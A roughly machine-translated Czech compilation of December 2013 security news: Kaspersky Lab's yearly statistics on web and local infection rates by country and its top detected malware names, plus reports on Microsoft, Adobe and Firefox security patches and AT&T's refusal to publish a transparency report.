Následující statistiky jsou založeny na fyzickém umístění on-line zdrojů, které byly použity při útocích, blokovaných antivirových (webové stránky, které obsahují přesměrování na exploity, stránky, které obsahují využije a další malware, botnet velitelských středisek, atd.). Každý jedinečný hostitel se může stát zdrojem jedné nebo více webových útoků.
Aby bylo možné určit zeměpisný zdroj webovými útoky, byla použita metoda, kterou jsou doménová jména uzavřeno proti skutečné domény IP adres, a pak zeměpisná poloha konkrétní IP adresu (GeoIP) je založena.
Za účelem provedení 1 700 870 654 útoků prostřednictvím internetu, počítačoví zločinci používají 10 604 273 unikátních hostitele, což je o 4 miliony více než v roce 2012. 82% z oznámení o blokovaných webových útoků byly vytvořeny tím, že blokuje webové zdroje se nacházejí v deseti zemích, což je 14,1 procentních bodů méně než v roce 2012.
Distribuce on-line zdrojů naočkována škodlivých programů, podle země
V roce 2013 nedošlo k výrazným změnám v Top 10 hodnocení hlavních zdrojů malware ve srovnání s 2012. Čína, která byla tradiční vůdce před rokem 2010, vypadl z top 10 a Vietnamu se objevil v 8. ročníku místě. V roce 2010 čínské úřady podařilo vypnutí spoustu škodlivých hosting zdrojů v jejich rámci kyberprostoru, zároveň kalení své právní předpisy týkající se doménových jmen v doméně. Zóny cn, což mělo za následek snížení škodlivých zdrojů v Číně. V roce 2010 byla Čína na 3 třetím místě, 6 th v roce 2011, 8 th v roce 2012 a v roce 2013 klesl na 21 st místo v hodnocení.
Země, kde se uživatelé setkávají nejvyšší riziko infekce on-line
Aby bylo možné posoudit, ve kterých zemích uživatelé čelit kybernetickým hrozbám nejčastěji, jsme vypočítali, jak často uživatelé Kaspersky setkat detekce rozsudky na svých strojích v každé zemi. Výsledná data charakterizuje riziko infekce na počítače, které jsou vystaveny v různých zemích po celém světě, poskytuje ukazatel agresivitě prostředí, ve kterém počítače pracují v různých zemích.
Top 20 zemí s nejvyšším rizikem infekce počítače přes internet:
Země * % Unikátních uživatelů **
1 Ázerbajdžán 56.29%
2 Kazachstán 55.62%
3 Arménie 54.92%
4 Rusko 54.50%
5 Tádžikistán 53.54%
6 Vietnam 50.34%
7 Moldavsko 47.20%
8 Bělorusko 47.08%
9 Ukrajina 45.66%
10 Kyrgyzstán 44.04%
11 Srí Lanka 43.66%
12 Rakousko 42.05%
13 Německo 41.95%
14 Indie 41.90%
15 Uzbekistán 41.49%
16 Gruzie 40.96%
17 Malajsie 40.22%
18 Alžír 39.98%
19 Řecko 39.92%
20 Itálie 39.61%
Tyto statistiky jsou založeny na detekci rozsudky vrácených web antivirového modulu, obdržely od uživatelů produktů společnosti Kaspersky Lab, kteří souhlasili, aby jejich statistických údajů.
* Vyloučili jsme ty země, v nichž počet uživatelů produktů společnosti Kaspersky Lab je relativně malý (méně než 10000).
* * Unikátní Uživatelé, jejichž počítače byly terčem internetových útoků jako podíl z celkového počtu unikátních uživatelů produktů společnosti Kaspersky Lab v zemi.
V roce 2013 spatřil nový vůdce objeví, se Ázerbájdžán skončil na prvním místě s 56,3% napadených uživatelům. Rusko, který zvítězil v předchozích dvou letech klesl na 4. ročníku místě s 54,4% (o 4,1 procentního bodu méně, než loni).
USA, Španělsko, Omán, Súdán, Bangladéš, Maledivy a Turkmenistán vypadl z TOP 20 seznamu zemí. Mezi nově příchozími jsou Rakousko, Německo, Řecko, Gruzie, Kyrgyzstán, Vietnam a Alžírsko.
USA klesl z 19 th až 25 th . Jeho podíl se snížil o 7 procentních bodů na 38,1%. Pro připomenutí, před dvěma roky USA byl ve 3. třetím místě. Snižující se úroveň rizika spojeného s webovými útoky v USA může být spojeno s rostoucí popularitou surfování po webu prostřednictvím mobilních zařízení. Španělsko, které zaokrouhlují TOP 20 hodnocení loňského roku, se objevil v 31. st místě v roce 2013 (36,7% - o 8 bodů méně než v předchozím roce).
Rakousko (8 bodů) skončil rok na 12. ročníku místě, Německo je v 13 th (9,3 bodů) a Řecku (-1,6 bodů) je v 19 th . Další západoevropské země - Itálie (-6 bodů) - dokončí rating.
Všechny země mohou být přiřazeny do jedné z následujících kategorií na základě jejich úrovně rizika a zároveň surfovat na internetu:
Vysoké riziko. Tato skupina zahrnuje 15 zemí z TOP 20 v rozmezí 41-60%. Oni jsou Rusko, Rakousko, Německo, několik bývalých sovětských republik a asijské země. Tato skupina má více než polovinu od loňského roku, kdy se skládala z 31 zemí.
Střední Riziko
celkem 118 zemí v rozmezí 21 - 40,99%: Austrálie (38,9%), USA (38,1%), Kanada (36,5%), Itálie (39,6%), Francie (38,1%), Španělsko (36,7 %), Velká Británie (36,7%), Nizozemí (27,3%), Finsko (23,6%), v Dánsku (21,8%), Polsko (37,6%), Rumunsko (33,2%), Bulharsko (24,1%), Brazílie (34,6 %), Mexiko (29,5%), Argentina (25%), Čína (32,2%), Japonsko (25,3%).
Nízké riziko (0-20,99%)
celkem 25 zemí: Česká republika (20,3%), Slovensko (19,7%), Singapur (18,5%) a počet afrických zemí.
Africké země s nízkou úrovní rizika, se ukázalo, že mají vysokou a mírné riziko infekce místních hrozeb (viz níže). Internet v těchto zemích je stále ještě silně vyvinuté. Proto, aby sdílení dat uživatelů stále využívat v různých vyměnitelných médií. To je důvod, proč webové útoky ohrožují tak málo uživatelů, zatímco malware, rozloženy vyměnitelných nosičů dat, je často detekován na počítači.
Průměrná globální úrovni internetových hrozeb vzrostl o 6,9 procentního bodu - v roce 2013, 41,6% uživatelů počítačů se setkal útoky alespoň jednou. Internet je stále hlavním zdrojem malware pro uživatele ve většině zemí po celém světě.
Místní hrozby
Místní statistiky infekce pro uživatele počítačů jsou kriticky důležitým ukazatelem. Tato data upozorňuje na hrozby, které pronikly na počítačový systém přes něco jiného než Internet, e-mail, nebo síťových portů na.
Tato část zprávy obsahuje analýzu statistik na základě údajů získaných ze skeneru a skenování statistik on-access pro různé disky, včetně vyměnitelných médií (skeneru na vyžádání).
Kaspersky Lab antivirové řešení zjištěno téměř 3 miliardy malware incidenty na počítačích, které se účastní v systému Kaspersky Security Network.
V celkem 1,8 milionu škodlivých nebo potenciálně nežádoucí programy, byly zjištěny v těchto incidentů.
Top 20 škodlivé objekty zjištěné na uživatelských počítačích
Název % Jednotlivých uživatelů *
1 DangerousObject.Multi.Generic 39.1%
2 Trojan.Win32.Generic 38.0%
3 Trojan.Win32.AutoRun.gen 20.1%
4 Virus.Win32.Sality.gen 13.4%
5 Exploit.Win32.CVE-2010-2568.gen 10.6%
6 AdWare.Win32.DelBar.a 8,0%
7 Trojan.Win32.Starter.lgb 6,6%
8 Virus.Win32.Nimnul.a 5.5%
9 Worm.Win32.Debris.a 5,4%
10 Virus.Win32.Generic 5,4%
11 Trojan.Script.Generic 5,4%
12 Net-Worm.Win32.Kido.ih 5.1%
13 AdWare.Win32.Bromngr.i 4.6%
14 Net-Worm.Win32.Kido.ir 4,4%
15 Trojan.Win32.Starter.yy 3.9%
16 DangerousPattern.Multi.Generic 3,8%
17 HiddenObject.Multi.Generic 3,8%
18 Trojan.Win32.Hosts2.gen 3.7%
19 AdWare.Win32.Agent.aeph 3,6%
20 Trojan.WinLNK.Runner.ea 3,6%
Tyto statistiky jsou sestavovány z detekce malwaru rozsudky vytvořených skenerem modulů on-access a on-demand na počítačích těchto uživatelů se systémem produkty společnosti Kaspersky Lab, které souhlasily s tím, aby předložily své statistické údaje.
* Podíl jednotlivých uživatelů na jehož computers antivir detekovat tyto objekty jako procento všech jednotlivých uživatelů produktů společnosti Kaspersky Lab, na jehož počítačů byl zjištěn škodlivý program.
V roce 2013, škodlivé programy jsou klasifikovány jako DangerousObject.Multi.Generic a zjištěné pomocí cloudových technologií umístila na prvním místě v seznamu Top 20 škodlivých objektŧ zjištěných na uživatelských počítačích. Cloud technologie fungovat, pokud jsou ještě v antivirových databázích žádné podpisy, a žádné heuristiky pro detekci škodlivých programů, ale společnosti Kaspersky Lab mrak již má k dispozici údaje o hrozbu. To je v podstatě, jak jsou zjištěny nejnovější škodlivé programy. S Detection System Urgent (UDS) implementované v systému Kaspersky Security Network více než 11 miliónů počítačů přijatých real-time ochranu.
Loňský lídr Trojan.Win32.Generic přišel druhý vychází z rozsudků vydaných na základě heuristické analýzy.
Exploit.Win32.CVE 2010-2568.gen (5. místo) a Trojan.WinLNK.Runner.ea (20. místo) jsou zjištěny rozsudky přiřazené škodlivých Inkoustové soubory (zkratky). Inkoustové soubory těchto rodin spustit další škodlivé spustitelné soubory. Oni jsou aktivně využívány červů pro distribuci prostřednictvím paměťových USB médií.
Osm z Top 20 programů, a to buď integrovat self-proliferující mechanismus, nebo se používají jako jednu ze složek v systému distribuce šnekového: Virus.Win32.Sality.gen (4. místo), Trojan.Win32.Starter.lgb (7. místo), Virus.Win32.Nimnul.a (8. místo), Worm.Win32.Debris.a (9. místo), Virus.Win32.Generic (10. místo), Net-Worm.Win32.Kido.ih (12. místo) , Net-Worm.Win32.Kido.ir (14. místo), Trojan.Win32.Starter.yy (15. místo).
Procento Net-Worm.Win32.Kido červy (12. a 14. místo), který se poprvé objevil v roce 2008, se snižuje s každým rokem, jak uživatelům aktualizovat své systémy.
Virus.Win32.Virut rodina rozsudků nepodařilo, aby se do Top 20 v roce 2013, zatímco podíl ostatních virů - Sality (4. místo) a Nimnul (8. místo) - vzrostl o 8,5 a 1,4 procentního bodu, resp.
Letošní novinkou Worm.Win32.Debris.a skončil na 9. místě. Tento červ je distribuován prostřednictvím vyměnitelných médií s pomocí inkoustu souborů. Užitečné zatížení tohoto červa je škodlivý program, Andromeda, která se používá pro stažení souborů třetích stran. Tento program se poprvé objevil na virus spisovatel černém trhu v roce 2011. Nicméně, nové způsoby montáže a distribuce znamená, že jsme přiřazeny do oddělené rodině.
Trojan.Win32.Hosts2.gen je na 18. místě. Tento verdikt je přiřazena škodlivých programů, které se snaží změnit soubor hosts speciální přesměrování požadavků uživatelů na určité domény na hostitele pod jejich kontrolou.
Země, kde se uživatelé setkávají nejvyšší riziko lokální infekce
Aby bylo možné posoudit míru rizika pro on-line infekci, kterým čelí uživatelé v různých zemích, jsme vypočítali, jak často uživatelé s produkty společnosti Kaspersky Lab se setkal webových antivirové detekce v průběhu roku. Zájmu se údaje týkající se detekce malwaru na uživatelských počítačích nebo na vyměnitelné médium připojené k počítači - USB flash disky, kamery a telefon paměťové karty, externí pevné disky. V podstatě, tyto statistiky odrážejí úroveň osobního počítače infekcí v různých zemích světa.
Úrovně Computer infekce podle zemí - Top 20:
Země * % **
Vietnam 68.14%
Bangladéš 64.93%
Nepál 62.39%
Mongolsko 60.18%
Indie 59.26%
Súdán 58.35%
Afghánistán 57.46%
Alžírsko 56.65%
Laos 56.29%
Kambodža 55.57%
Irák 54.91%
Džibuti 54.36%
Maledivy 54.34%
Pákistán 54.12%
Srí Lanka 53.36%
Mauritánie 53.02%
Indonésie 52.03%
Rwanda 51.68%
Angola 50.91%
Egypt 50.67%
Tyto statistiky jsou založeny na detekční verdicts vrácených modulu Antivirus, získaných od uživatelů produktů společnosti Kaspersky Lab, kteří souhlasili, aby své statistické údaje.
* Při výpočtu jsme vyřadili země, kde existují méně než 10.000 uživatelů Kaspersky Lab.
** Podíl unikátních uživatelů v zemi s počítači, které zablokoval místní hrozby jako podíl z celkového počtu unikátních uživatelů produktů společnosti Kaspersky Lab.
Již více než rok, Top 20 pozice v této kategorii byly drženy zemí v Africe, na Středním východě a jihovýchodní Asii. Od loňské pořadí, situace v top-zařadil zemích zlepšila: v roce 2012, údaj za první-umístil země byla více než 99%, v roce 2013, což je nejvyšší číslo nedosáhl 70%.
V roce 2013 v průměru o 60,1% počítačů připojených k KSN byly podrobeny alespoň jeden útok a zároveň surfovat na internetu ve srovnání s 73,8% v roce 2012.
Země mohou být rozděleny do kategorií z hlediska místních hrozeb. Vzhledem k celkovému snížení úrovně lokálních infekcí pravděpodobně způsobených poklesem využití flash disky pro výměnu informací, jsme se snížil práh pro úroveň skupiny (ve srovnání se statistikami pro rok 2012).
Maximální riziko (více než 60%): čtyři země, včetně Vietnamu (68,1%), Bangladéš (64,9%), Nepálu (62,4%) a Mongolska (60,2%).
Vysoké riziko 67 zemích po celém světě, včetně Indie (59,2%), Čína (46,7%), Kazachstánu (46%), Ázerbájdžánu (44,1%), Ruska (41,5%), většina afrických zemí.
Mírné lokální míra infekce (21 - 40,99%). V 78 zemích po celém světě, včetně Španělska (36%), Francie (33,9%), Portugalsku (33,1%), Itálie (32,9%), Německo (30,2%), USA (29%), Velké Británii (28,5%) , Švýcarsko (24,6%), ve Švédsku (21,4%), Ukrajiny (37,3%), Brazílie (40,2%), Argentina (35,2%), Chile (28,9%), Jižní Korea (35,2%), Singapur (22,8%).
Nízká míra místní infekce (0-20,99%). Devět zemí z celého světa.
Top 10 zemí s nejnižším rizikem lokální infekce jsou:
Hodnost Země %
1 Dánsko 14.74%
2 Česká republika 15.58%
3 Finsko 15.93%
4 Kuba 17.18%
5 Japonsko 18.93%
6 Slovensko 19.24%
7 Slovinsko 19.32%
8 Norsko 19.36%
9 Seychely 19.90%
10 Malta 21.28%
V roce 2013, jedna nová země - Seychely - objevil se v tomto Top 10, tlačí na Nizozemí.
V průměru 18,4% z uživatelů počítačů byli napadeni ve skupině s nízkým rizikem zemí. To je o 6,6 procentních bodů méně než v loňském roce.
Microsoft Patche GDI + Zero Day; Odborníci nutkání Bližší pohled na "důležité" ASLR Bypass
11.12.2013 Zranitelnosti
Jeden zero-day dole, jeden jít.
Jak se dalo očekávat, Microsoft udělal dnes náplast na zero-day ve svém GDI + grafika složka ( MS13-096 ) hlášen před více než měsíc poté, co využije byl spatřen ve volné přírodě. Oprava byla jedna z 11 bezpečnostních bulletinů-pět kritických vydána jako součást 12. 2013 aktualizace zabezpečení Patch Tuesday.
Další zero-day, jeden ovlivňuje pouze uživatelům Windows XP, stále unpatched přes aktivní činů zaměřených na zranitelnost, který se nachází v ovladači NDProxy, který spravuje Microsoft Telephony API. Útoky jsou závislé na druhém zranitelnosti dodat využít proti stroji XP. Společnost Microsoft doporučuje vypnout NDProxy jako zmírnění, dokud patch je k dispozici.
Zatímco tam bylo pět kritických bulletiny dnes zveřejnila, experti nutkání IT správcům i priority o ASLR bypass chybu zabezpečení, která byla opravenou dnes a jmenovitou "důležité" Microsoft.
MS13-106 se postará o zranitelnosti Office, který je využíván ve volné přírodě, řekl Microsoft. Útočníci hosting škodlivý využít on-line může vyvolat zranitelnost v hxds.dll, který umožňuje obchvat ASLR nebo adresového prostoru Layout Randomization, funkce zabezpečení v systému Windows, která zmírňuje paměti využije korupce.
"Tato chyba zabezpečení by mohla umožnit bezpečnostní funkce bypass, pokud uživatel zobrazí speciálně vytvořenou webovou stránku ve webovém prohlížeči schopného instancí COM komponenty, jako je Internet Explorer," uvedl Microsoft ve svém poradenství. "Funkce zabezpečení bypass sám o sobě neumožňuje spuštění libovolného kódu. Nicméně, by útočník mohl použít tuto ASLR obejít chybu ve spojení s jiným zranitelnosti, jako je například vzdálené spuštění kódu, která by mohla využít na ASLR obchvatu spustit libovolný kód. "
ASLR obchvaty byly častější v letošním roce, a které byly stočeny do počtu využívají sad. Zavedena v systému Windows Vista, ASLR brání spolehlivost využije negací schopnost útočníka předpovědět, kde strojové instrukce budou existovat v paměti. ASLR je zvláště účinný proti buffer overflow útoky.
"Tento konkrétní knihovna, hxds.dll, byl používán mnoha útoků ve volné přírodě s velkým úspěchem, protože je lze snadno načíst do paměti z webové stránky pomocí" ms-help: 'popisovač protokolu, "řekl Craig Young, Bezpečnostní výzkumník na Tripwire. "Až do dnešního dne pouze možnosti, které chrání proti tomuto bylo odstranění Office 2007/2010 instaluje a umožňuje společnosti Microsoft Enhanced Experience Toolkit pro zmírňování (Emet)."
Správci budou muset potýkat také s dalším kumulativní aktualizace pro aplikaci Internet Explorer. MS13-097 záplat řadu vzdálené spuštění kódu zranitelnosti v prohlížeči, celou cestu zpět do IE 6. IE je oprava téměř každý měsíc v tomto roce a byl v popředí v mnoha cílených útoků.
Microsoft také oprava kritickou chybu ve svém Authenticode podpisového algoritmu, který je zneužívanou. MS13-098 umožňuje vzdálené spuštění kódu, pokud uživatel se zlákat ke spuštění aplikace, která obsahuje škodlivý a podepsaný přenosné provedení souboru. Patch upravuje, jak funkce WinVerifyTrust zpracovává Windows Authenticode ověření podpisu pro soubory PE, řekl Microsoft.
"Útočníci byli zneužívání instalátory z legitimních výrobců softwaru nainstalovat malware. Tyto instalační jsou konfigurovány tak, aby dynamicky stahovat rozšíření kódu, které nejsou kontrolovány pro správné podpisy, a útočníci našli způsob, jak se na zádech na tomto mechanismu, "řekl Qualys CTO Wolfgang Kandek, který dodal, že oprava připravuje systém více přísná kontrola integrity, která brání takové zneužití. Microsoft také vydal samostatný bezpečnostní poradenství , pokud jde o Authenticode náplasti, která po 10.6.2014 bude již rozpoznat nevyhovující podepsané binární soubory.
Zbývající dvě kritické bulletiny, MS13-099 a MS13-105 , propojovací vzdálené spuštění kódu chyby zabezpečení v aplikaci Microsoft Scripting Runtime knihovny objektů a Exchange Server, resp. Tři ze čtyř Exchange chyby zabezpečení v bulletinu, že to stojí za zmínku, jsou zveřejněny. Nejvážnější je v WebReady prohlížení dokumentů a DLP funkcí Exchange Serveru, řekl Microsoft.
Zbývající bulletiny s hodnocením "důležité" Adresa jeden vzdálené spuštění kódu chyba, tři otázky eskalaci práv a zpřístupnění informací zranitelnosti:
MS13-100 nášivky vzdálené spuštění kódu v aplikaci Microsoft SharePoint Server, musel by být ověřeny na server tuto chybu zabezpečení zneužít. Úspěšný využití by umožnit útočníkovi spustit kód v kontextu w3wp účtu služby na webu služby SharePoint.
MS13-101 řeší problém zvýšení úrovně oprávnění v systému Windows ovladače režimu jádra. Útočník by musel přihlásit do systému a spustit škodlivý aplikace využívat chybu.
MS13-102 je oprava pro chybu zabezpečení v klientovi LRPC, která by mohla útočníkovi umožnit zvýšit své oprávnění na LRPC serveru. To by mohlo útočníkovi dovolit instalovat programy, manipulovat s daty nebo vytvořit účet. Platné pověření jsou potřeba využít tuto chybu.
MS13-103 nášivky chybu zabezpečení v ASP.NET SignalIR, které by mohly zvýšit oprávnění útočník, pokud jsou schopni reflektovat Javascript zpět do prohlížeče uživatele. Microsoft také vydal poradenství pro chyby v zobrazení stavu technologie ASP.NET, která existuje, když je stroj Authentication Code (MAC) validace vypnuta pomocí nastavení konfigurace.
MS13-104 je oprava pro chybu zabezpečení typu zpřístupnění informací v aplikaci Microsoft Office. Úspěšné využije mohl dát přístupové tokeny útočník používané k ověření uživatele na serveru SharePoint nebo serverovny Office.
Microsoft také vyslali zpravodaje , který odebere digitální podpisy pro devět soukromých, UEFI moduly třetích stran pro Windows 8 a Windows Server 2012 strojů. Tyto moduly by být načten během Secure Boot UEFI, pokud je povolen.
AT & T Cites Uživatel soukromí v odmítnutí vydat Zpráva o průhlednosti
11.12.2013 Bezpečnost
Telekomunikační gigant AT & T se dostala pod oheň od obhájců soukromí po uznala, že nebude zveřejňovat některé z jeho jednání s Národní bezpečnostní agentury.
at & tpaper
Společnost tvrdila, že ochrana soukromí zákazníků je v jádru své rozhodnutí, že nebude sdílet žádosti vlády v dopise US Securities and Exchange Commission.
Dopis, v pořádku, napsal právním zástupcem společnosti, je volit, že tato otázka nemůže být vychován na AT & T výroční schůzi akcionářů na jaře příštího roku.
Akcionáři, spolu se zástupci z ACLU, byly rallye pro společnost zveřejní zprávu o transparentnosti, stejně jako těm, které nedávno produkoval Facebook , Twitter a Google , vyčistit vzduch kolem přesně to, co - a jak moc - informace o zákaznících, že sdílí s vláda.
AT & T Dopis však tvrdí, že druh informací není něčí podnikání, zejména jeho uživatelé nebo akcionáři, argumentovat, že to je "funkce pro správu jádra" a "nedílnou součástí AT & T day-to-day obchodních operací."
Dále se říká, že zveřejnění těchto informací by mohlo ohrozit právní strategii společnosti, a upozorňuje, několik nevyřízených soudních sporů, které vyžadují, aby společnost "poskytnout osobní údaje jiným subjektům, jako jsou vládní agentury, úvěrovými institucemi a inkasních agentur."
Zatímco dopis více či méně zcela odmítá koncept zprávy o průhlednosti, AT & T uvádí, že pokud by bylo k výrobě jednoho, by mělo být omezeno na reakci společnosti na žádosti vymáhání práva na informace, a to informace o činnosti vlády dozoru.
Verizon a AT & T akcionářům vydány písmena (. pdf) v listopadu požádat společnostem "zveřejnit pololetní zprávy, subjektem existujících zákonů a nařízení, poskytuje metriky a diskuse týkající se žádostí o informace zákazníků americkými a zahraničními vládami."
Tyto dopisy citoval kontroverzní června Wall Street Journal článek , který tvrdil, AT & T "za předpokladu, miliony záznamů hovorů amerických zákazníků na Agenturu pro americkou národní bezpečnost (NSA)," a vyzval společnost, aby ve stopách velkých internetových společností, které začaly publikování podobné zprávy o průhlednosti.
Obě společnosti skóroval uboze na Electronic Frontier Foundation " Kdo má Vaše záda? "vysvědčení, vydaná již v květnu . Výroční zpráva, která vyřazuje hlavní komunikaci a sociální mediální společnosti "postoje k ochraně osobních údajů, poukazuje na to, že obě společnosti nepodaří sdělit své uživatele o datových požadavků, nepodaří publikovat pokyny vymáhání práva a nebude bojovat o svých uživatelských práv na ochranu soukromí u soudu .
Mezitím, odpor veřejnosti k AT & T začala vyzvednout páry v důsledku jeho postoje.
Petice začal San Francisco ACLU kanceláři vyzývající obě společnosti, aby byly transparentnější, co to dělá s informacemi pro uživatele shromáždil téměř 32.000 příznivců v několika dnech od AT & T prohlášení.
"Pracujeme s našimi přáteli na SumOfUs shromáždit tisíce AT & T a Verizon zákazníky a potenciálními zákazníky a dokázat na tyto obří telekomunikační společnosti, že jejich mlčení je uvedení jejich veřejný obraz a spodní linie v ohrožení," píše se v petici.
AT & T je pochopitelně chybí ze seznamu osmi firem: AOL, Apple, Facebook, Google, LinkedIn, Microsoft, Twitter a Yahoo, který včera vytvořil koalici , reformu vláda dohled, vyzývající k reformě
činnosti vlády dozoru do budoucna, po -NSA odhalení.
Adobe Lodě Patche pro Flash, Shockwave přehrávače
11.12.2013 Zranitelnosti
Adobe zveřejnila dva bulletiny zabezpečení dnes, řešení pár slabých míst v obou Shockwave a Flash Player.
Tato aktualizace zabezpečení Shockwave platí pro verze 12.0.6.147 a starších na Windows a Mac OS X a řeší pár korupce paměti zranitelnosti (CVE-2013-5.333 a CVE-2013 až 5334), které by mohly dát útočník možnost spuštění kódu na dálku . Adobe udělena tato chyba prioritní rating 1, což znamená, že útočníci jsou to pravděpodobně cílení - nebo brzy bude to cílení - ve volné přírodě.
Adobe také vytlačila aktualizace zabezpečení pro verzi 11.9.900.152 a starších jeho Flash Player pro Windows a Mac OS X a pro verze 11.2.202.327 a starší pro linuxové systémy. Aktualizace řeší typu zmatenost zranitelnost (CVE-2013-5331) a poškození paměti zranitelnost (CVE-2013 až 5332), z nichž každá by mohla umožnit vzdálené spuštění kódu, což způsobuje pády, a případně dávat kontrolu útočníka postižených strojích.
"Adobe si je vědoma zpráv, které exploit, jejichž cílem je přimět uživatele k otevření dokumentu aplikace Microsoft Word s nebezpečným Flash (. Swf) Obsah existuje CVE-2013-5331," říká Adobe v bulletinu oznámení. "Adobe Flash Player 11.6 a novější poskytnout zmírnění proti tomuto útoku."
Adobe se doporučuje, aby uživatelé následující:
Uživatelé aplikace Adobe Flash Player 11.9.900.152 a starších verzích pro Windows a Macintosh by měl provést aktualizaci na verzi Adobe Flash Player 11.9.900.170.
Uživatelé aplikace Adobe Flash Player 11.2.202.327 a starších verzích pro Linux by měl provést aktualizaci na verzi Adobe Flash Player 11.2.202.332.
Adobe Flash Player 11.9.900.152 nainstalován Google Chrome bude automaticky aktualizován na nejnovější verzi Google Chrome, který bude obsahovat Adobe Flash Player 11.9.900.170 pro Windows, Macintosh a Linux.
Adobe Flash Player 11.9.900.152 nainstalován s aplikací Internet Explorer 10 bude automaticky aktualizován na nejnovější Internet Explorer 10 verze, která bude obsahovat Adobe Flash Player 11.9.900.170 pro Windows 8.0
Adobe Flash Player 11.9.900.152 nainstalován s aplikací Internet Explorer 11 bude automaticky aktualizován na nejnovější Internet Explorer 11 verze, která bude obsahovat Adobe Flash Player 11.9.900.170 pro Windows 8.1
Uživatelé Adobe AIR 3.9.0.1210 a starších verzích pro Windows a Macintosh by měli aktualizovat na verzi Adobe AIR 3.9.0.1380.
Uživatelé Adobe AIR 3.9.0.1210 a starších verzích pro Android by měl aktualizovat na verzi Adobe AIR 3.9.0.1380.
Uživatelé Adobe AIR 3.9.0.1210 SDK a starších verzích by měl provést aktualizaci na Adobe AIR 3.9.0.1380 SDK.
Uživatelé Adobe AIR 3.9.0.1210 SDK a kompilátoru a dřívějších verzích by měl provést aktualizaci na Adobe AIR 3.9.0.1380 SDK a překladače.
Adobe zvažuje Flash chyby ve Windows a Mac OS X nejvyšší prioritu, zatímco Linux Flash chyba a zranitelnosti Adobe Air jsou přijímání pouze prioritní rating tří, což znamená, že je nepravděpodobné, že útočníci se zaměří na tyto chyby.
Adobe uznává Liangliang Song a Honggang Ren z Fortinet pro nalezení Shockwave chyby a David D. Rude II iDefense Labs Attila Suszter z couvání na Windows blogu pro nalezení Flash chyby.
Firefox 26 Dělá Java Pluginy Click-to-Play, oprav 14 bezpečnostní chyby
11.12.2013 Zranitelnosti
Mozilla vydala významnou novou verzi Firefoxu, která obsahuje opravy pro více než tucet chyb zabezpečení, stejně jako významnou změnu, která dělá vše Java pluginy click-to-play je výchozí. Tato funkce zabraňuje ty pluginy od spuštění automaticky na webových stránkách, které pomáhá chránit uživatele před některými webovými útoky.
Změna způsobu, jakým Firefox 26 zachází s pluginy je významným bezpečnostním přínosem pro uživatele, zejména ty, kteří nemusí být vědomi bezpečnostních problémů, které pluginy mohou způsobit. Útočníci se bude používat zabezpečení v pluginů, jako je Java, Flash nebo Silverlight kompromisy uživatelům, kteří navštíví web, který obsahuje obsah, který je automaticky poskytovaných těmito příponami. Mozilla začal proces změnou způsobu, jakým zachází Firefox pluginy na začátku tohoto roku, ale toto je poprvé, kdy tato změna ukázala až v konečné verzi prohlížeče.
"I přesto, že mnozí uživatelé nejsou ani vědomi pluginů, které jsou významným zdrojem visí, pády, a bezpečnostních incidentů. Tím umožňuje uživatelům rozhodnout, které stránky je třeba použít pluginy, Firefox pomáhají chránit a udržovat svůj prohlížeč běží hladce, " Mozilla Benjamin Smedberg uvedl již dříve letos na podzim o připravované změně Firefoxu manipulaci pluginů.
Java byla zejména oblíbenou útočníků v posledních letech, díky dlouhým ocasem bezpečnostních otázek a všudypřítomnosti na webu. Tvorba všechny Java pluginy click-to-play znamená, že uživatelé budou nyní muset explicitně zvolit hrát plugin kdykoliv se setkají s jedním. Ostatní prohlížeče, jako je Google Chrome, dává uživatelům možnost umožňuje click-to-play, stejně.
Kromě změny plugin chování, Firefox 26 má také záplaty pro řadu slabých míst, včetně pěti kritických ty. Hlavní oprava v novém prohlížeči je Mozilla aktivně zrušení důvěra ve střední certifikátem vydaným Agence Nationale de la Sécurité des Systèmes d'informace ve Francii. Certifikát byl používán k vydávání certifikátů pro několik domén Google omylem. Vědci Google zjištěn problém a odvolává důvěru pro potvrzení, jakož i, a oznámí jiných dodavatelů prohlížeče. Mozilla úředníků řekl, že nevěří, že chyba dát každému uživateli v nebezpečí, mimo síť certifikační autority je.
"Intermediate certifikát, který se používá pro MITM umožňuje držiteli certifikátu dešifrovat a sledovat komunikaci v rámci své sítě mezi uživatelem a libovolné webové stránky, aniž by varování prohlížeče se spustí. Útočník vyzbrojený podvodné SSL certifikát a schopnost ovládat síť jejich oběti mohly vydávat webových stránek takovým způsobem, že by bylo nezjistitelné pro většinu uživatelů. Tyto certifikáty by mohly klamat uživatele na důvěře internetových stránkách uvedených pocházejí od majitele domény, ale ve skutečnosti obsahuje nebezpečný obsah nebo software. Věříme, že tato instance MITM byl omezen na vnitřní síti podřízených CA, " Kathleen Wilson Mozilla řekl.
Mezi další bezpečnostní opravy ve Firefoxu 26 patří:
MFSA 2013-116 informace JPEG úniku
MFSA 2013-115 GetElementIC zadané pole pahýly mohou být generovány mimo dodržovat typesets
MFSA 2013-114 Use-po-zdarma syntetického pohybu myši
MFSA 2013-113 Nastavení zabezpečení pro vestavěné kořeny ignorovány během ověření certifikátu EV
MFSA 2013-112 Linux Informace schránky zpřístupnění když výběr pasta
MFSA 2013-111 porušení segmentace při výměně objednané prvky seznamu
MFSA 2013-110 Potenciální přetečení JavaScript binární vyhledávací algoritmy
MFSA 2013-109 Use-po-free v tabulce střihu
MFSA 2013-108 Use-po-zdarma posluchačů událostí
MFSA 2013-107 omezení Sandbox nevztahuje na vnořený objekt prvky
MFSA 2013-106 Kódování znaků cross-původ XSS útok
MFSA 2013-105 Instalace aplikace doorhanger trvá na navigaci
MFSA 2013-104 bezpečnostní Různé paměti nebezpečí (rv: 26.0 / rv: 24.2)
Microsoft Updates 12. 2013 - Vyspravování kritické 0 dnů Exploited v přírodě
11.12.2013 Zranitelnosti
Osm Microsoft Security Bulletiny jsou vytlačeny tento měsíc, MS13-096 až MS13-106. Pět z nich je hodnocena jako "kritické" a dalších šest hodnocena jako "Důležité". Mezi hlavní priority pro zavádění tohoto měsíce jsou kritické GDI + (MS13-096), Internet Explorer (MS13-097), a Scripting Runtime (MS13-099) aktualizace.
Několik zranitelností byly aktivně využívány v rámci cílených útoků po celém světě, a jeden z nich je známo, že se ITW po dobu nejméně šesti měsíců, nebo tak.
